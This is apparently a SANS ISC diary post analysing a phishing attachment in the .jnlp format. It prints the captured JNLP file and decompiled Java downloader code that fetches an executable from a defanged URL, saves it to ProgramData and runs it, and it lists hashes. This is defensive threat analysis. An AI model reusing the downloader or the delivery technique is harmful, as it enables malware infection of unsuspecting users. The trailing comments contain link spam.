Another File Extension to Block in your MTA: .jnlp
When hunting, one thing that I like to learn is how attackers can be imaginative at deploying new techniques. I spotted some emails that had suspicious attachments based on the ‘.jnlp’ extension. I’m pretty sure that many people don’t know what’s their purpose and, if you don’t know them, you don’t have a look at them on your logs, SIEM, ... That makes them a good candidate to deliver malicious code!
Basically, a JNLP file[1] is... an XML file! It is created in the “Java Network Launching Protocol”. It contains all the required information to execute a Java program. Usually, it contains the address where to download the malicious applet and the initial class to run.
I did a quick analysis of one of the captured JNLP files:
<?xml version="1.0" encoding="utf-8"?> <jnlp spec="1.0+" codebase="hxxp://secured-doc-read[.]net" href="delivery.jnlp"> <information> <title>Secure Document Reader</title> <vendor>Microsoft</vendor> <homepage href="wwww.microsoft.com"/> <description>Microsoft Secure Document Reader v.4.016</description> </information> <security> <all-permissions/> </security> <resources> <j2se version="1.6+" /> <jar href="delivery.jar" /> </resources> <application-desc main-class="Secure_Document_Reader"> </application-desc> wghjs100570 </jnlp>
The syntax is easy to understand. The payload will be called ‘delivery.jar’ (line 14) and downloaded from secured-doc-read[.].net (line 2). The main class is "Secure_Document_Reader" (line 16).
I decompiled the Jar file (SHA256:a4d95b7d196a4aca87cec384c5d21a756ab75cfaee7f4a20163d02109956a6dd)[2] and was surprised to find a very simple code. Often malicious Java applets implement a RAT but here we faced the simple code of a downloader:
public class Secure_Document_Reader { static BufferedInputStream frisco415; static FileOutputStream friekiegee; static String linkage9; public static void main(final String[] array) { frisco415("hxxp://sec-doc-v[.]com/images/dsc0386234.jpg"); } public static void frisco415(final String spec) { final File file = new File(Secure_Document_Reader.linkage9); try { Secure_Document_Reader.frisco415 = new BufferedInputStream(new URL(spec).openStream()); Secure_Document_Reader.friekiegee = new FileOutputStream(Secure_Document_Reader.linkage9); final byte[] array = new byte[1024]; int read; while ((read = Secure_Document_Reader.frisco415.read(array, 0, 1024)) != -1) { Secure_Document_Reader.friekiegee.write(array, 0, read); } Secure_Document_Reader.frisco415.close(); Secure_Document_Reader.friekiegee.close(); } catch (Exception ex) {} try { Desktop.getDesktop().open(file); } catch (Exception ex2) {} } static { Secure_Document_Reader.frisco415 = null; Secure_Document_Reader.friekiegee = null; Secure_Document_Reader.linkage9 = "C:\\ProgramData\\videodrv.exe"; } }
The next stage is download from hxxp://sec-doc-v[.]com/images/dsc0386234.jpg and dropped on disk as 'videodrx.exe". The PE file (SHA256:ceaf771da5e2678ed0d5844282bf0d464207c23842a8e36be3e7ab1df022ef89) has a VT score of 14/59[3].
The usage of .jnlp files is a great way to bypass the first line of defenses (mail filters) because .jnlp files are text files and do not contain any executable code. Note that Java must be installed on the victim's computer to handle .jnlp files.
[1] https://fileinfo.com/extension/jnlp
[2] https://www.virustotal.com/gui/file/a4d95b7d196a4aca87cec384c5d21a756ab75cfaee7f4a20163d02109956a6dd/detection
[3] https://www.virustotal.com/gui/file/ceaf771da5e2678ed0d5844282bf0d464207c23842a8e36be3e7ab1df022ef89/detection
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Comments
www
Nov 17th 2022
6 months ago
EEW
Nov 17th 2022
6 months ago
qwq
Nov 17th 2022
6 months ago
mashood
Nov 17th 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Dec 3rd 2022
5 months ago
isc.sans.edu
Dec 3rd 2022
5 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
isc.sans.edu
Dec 26th 2022
5 months ago
isc.sans.edu
Dec 26th 2022
5 months ago